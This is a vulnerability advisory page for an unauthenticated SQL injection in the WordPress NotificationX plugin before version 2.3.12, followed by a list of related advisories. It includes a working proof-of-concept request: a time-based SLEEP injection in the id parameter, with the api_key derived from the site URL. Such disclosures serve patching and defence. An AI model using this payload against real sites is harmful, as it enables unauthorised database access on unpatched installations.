NotificationX < 2.3.12 – Unauthenticated SQLi | Plugin Vulnerabilities

Description

The plugin does not validate and escape the id parameter in its notificationx/v1/notification REST endpoint before using it in a SQL statement, which could allow unauthenticated attackers to perform SQL Injection attacks.

Proof of Concept

The api_key is the md5 of the home_url (either with http or https protocol)

http://example.com/wp-json/notificationx/v1/notification/1?api_key=348ab38c4a43f7e22e7f936c534a08bc&id[1]=%3d(SELECT/**/1/**/WHERE/**/SLEEP(3))

Affects Plugins

Fixed in 2.3.12

References

URL

https://plugins.trac.wordpress.org/changeset/2685762

Classification

Type

SQLI

OWASP top 10

CWE

CVSS

Miscellaneous

Original Researcher

mikemyers

Verified

Yes

WPVDB ID

d1480717-726d-4be2-95cb-1007a3f010bb

Timeline

Publicly Published

2022-02-28 (about 3 years ago)

Added

2022-02-28 (about 3 years ago)

Last Updated

2022-02-28 (about 3 years ago)

Other

Published

Title

Published

2024-12-23

Title

Appointment Booking Calendar Plugin and Scheduling Plugin – BookingPress < 1.1.22 - Authenticated (Contributor+) SQL Injection

Published

2025-02-11

Title

ShipEngine Shipping Quotes < 1.0.8 - Unauthenticated SQL Injection

Published

2014-08-01

Title

st_newsletter - Remote SQL Injection

Published

2024-08-28

Title

Super Store Finder < 6.9.8 - Unauthenticated SQL Injection

Published

2023-10-30

Title

Image horizontal reel scroll slideshow < 13.3 - Authenticated (Subscriber+) SQL Injection via Shortcode